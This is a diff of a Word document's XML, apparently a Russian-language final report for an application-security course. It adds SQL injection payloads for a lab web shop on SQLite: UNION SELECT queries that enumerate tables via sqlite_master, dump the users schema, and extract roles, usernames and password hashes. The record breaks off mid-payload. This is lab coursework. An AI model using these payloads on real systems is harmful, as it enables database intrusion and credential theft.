--- a/AppSec/48_Final/final.docx
+++ b/AppSec/48_Final/final.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -24,16 +24,7 @@
         <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Запущен </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">стенд и </w:t>
-      </w:r>
-      <w:r>
-        <w:t>найдены</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> основные </w:t>
+        <w:t xml:space="preserve">Запущен стенд и найдены основные </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -41,10 +32,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
         <w:t>страницы</w:t>
@@ -193,25 +181,13 @@
       </w:r>
       <w:r>
         <w:softHyphen/>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-      <w:r>
-        <w:t>с</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> авторизаци</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ей</w:t>
+        <w:t>– с авторизацией</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Отправка </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">– </w:t>
+        <w:t xml:space="preserve">Отправка – </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -299,13 +275,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>– с авторизацией</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> – с авторизацией </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -323,13 +293,7 @@
         <w:rPr>
           <w:rStyle w:val="a4"/>
         </w:rPr>
-        <w:t>Ч</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a4"/>
-        </w:rPr>
-        <w:t xml:space="preserve">асть 2. SQL </w:t>
+        <w:t xml:space="preserve">Часть 2. SQL </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -482,7 +446,6 @@
         <w:ind w:left="360"/>
         <w:rPr>
           <w:highlight w:val="red"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -693,21 +656,73 @@
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> - </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> - '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>order_items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>'</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
         <w:rPr>
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id,name</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,price_cents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>order_items</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -716,7 +731,7 @@
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>'</w:t>
+        <w:t>—</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -729,13 +744,31 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>' UNION</w:t>
+        <w:t>name,NULL</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -743,36 +776,735 @@
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>id,name,price_cents</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE type='table' LIMIT 1 OFFSET 4--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>Для</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>вывода</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>всех</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>таблиц</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>используется</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>функция</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>объединения</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>group_concat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(name,','</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>),NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">,NULL FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE type='table'--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Результат</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – 'users, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_sequence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, products, reviews, orders, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>order_items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, secrets'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Узнаем</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>структуру</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>таблицы</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>пользователи</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> FROM </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="red"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>order_items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE name='users'--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Результат</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CREATE TABLE users (</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id INTE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GER PRIMARY KEY AUTOINCREMENT,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sername TEXT NOT NULL UNIQUE,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password_hash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> TEXT NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">role </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TEXT NOT NULL DEFAULT 'user',</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xss_solved</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL DE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>group_concat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>role</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,','</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL FROM users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>group_concat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sername</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,','</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL FROM user</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>s--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sername,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM user</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>s--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hash,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
